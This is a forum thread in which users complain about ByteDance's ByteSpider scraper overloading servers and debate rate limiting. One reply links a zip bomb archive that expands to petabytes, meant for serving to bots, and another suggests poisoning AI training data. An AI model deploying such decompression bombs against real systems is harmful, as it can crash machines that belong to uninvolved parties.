this post was submitted on 07 Oct 2024
460 points (98.7% liked)

Technology

58550 readers
4432 users here now

This is a most excellent place for technology news and articles.


Our Rules


  1. Follow the lemmy.world rules.
  2. Only tech related content.
  3. Be excellent to each another!
  4. Mod approved content bots can post up to 10 articles per day.
  5. Threads asking for personal tech support may be deleted.
  6. Politics threads may be removed.
  7. No memes allowed as posts, OK to post as comments.
  8. Only approved bots from the list below, to ask if your bot can be added please contact us.
  9. Check for duplicates before posting, duplicates may be removed

Approved Bots


founded 1 year ago
MODERATORS
you are viewing a single comment's thread
view the rest of the comments
[–] jagged_circle@feddit.nl -2 points 1 day ago* (last edited 1 day ago) (5 children)

This is fine. I support archiving the Internet.

It kinda drives me crazy how normalized anti-scraping rhetoric is. There is nothing wrong with (rate limited) scraping

The only bots we need to worry about are the ones that POST, not the ones that GET

[–] Olgratin_Magmatoe@lemmy.world 2 points 6 hours ago

GET requests can still overload a system.

[–] purrtastic@lemmy.nz 37 points 22 hours ago (1 children)

It’s not fine. They are not archiving the internet.

I had to ban their user agent after very aggressive scraping that would have taken down our servers. Fuck this shitty behaviour.

[–] Melvin_Ferd@lemmy.world 4 points 22 hours ago (1 children)

Isn't there a way to limit requests so that traffic isn't bringing down your servers

[–] Mojave@lemmy.world 10 points 20 hours ago

They obfuscate their traffic by randomizing user agents, so it's either add a global rate limit, or let them ass fuck you

[–] Max_P@lemmy.max-p.me 40 points 1 day ago (1 children)

I had to block ByteSpider at work because it can't even parse HTML correctly and just hammers the same page and accounts to sometimes 80% of the traffic hitting a customer's site and taking it down.

The big problem with AI scrapers is unlike Google and traditional search engines, they just scrape so aggressively. Even if it's all GETs, they hit years old content that's not cached and use up the majority of the CPU time on the web servers.

Scraping is okay, using up a whole 8 vCPU instance for days to feed AI models is not. They even actively use dozens of IPs to bypass the rate limits too, so theyre basically DDoS'ing whoever they scrape with no fucks given. I've been woken up by the pager way too often due to ByteSpider.

My next step is rewriting all the content with GPT-2 and serving it to bots so their models collapse.

[–] jagged_circle@feddit.nl 7 points 21 hours ago (1 children)

I think a common nginx config is to just redirect malicious bots to some well-cached terrabyte file. I think hetzner hosts one iirc

[–] SomethingBurger@jlai.lu 10 points 21 hours ago

https://github.com/iamtraction/ZOD

42kB ZIP file which decompresses into 4.5 PB.

[–] Ghostalmedia@lemmy.world 37 points 1 day ago

Bytedance ain’t looking to build an archival tool. This is to train gen AI models.

[–] zod000@lemmy.ml 24 points 1 day ago (1 children)

Bullshit. This bot doesn't identify itself as a bot and doesn't rate limit itself to anything that would be an appropriate amount. We were seeing more traffic from this thing that all other crawlers combined.

[–] jagged_circle@feddit.nl 3 points 21 hours ago* (last edited 16 hours ago) (2 children)

Not rate limiting is bad. Hate them because of that, not because they're a bot.

Some bots are nice

[–] zod000@lemmy.ml 1 points 6 hours ago

I don't hate all bots, I hate this bot specifically because:

  • they intentionally hide that they are a bot to evade our, and everyone else's, methods of restricting which bots we allow and how much activity we allow.
  • they do not respect the robots.txt
  • the already mentioned lack of rate limiting
[–] Zangoose@lemmy.world 1 points 8 hours ago

Even if they were rate limiting they're still just using the bot to train an AI. If it's from a company there's a 99% chance the bot is bad. I'm leaving 1% for whatever the Internet Archive (are they even a company tho?) is doing.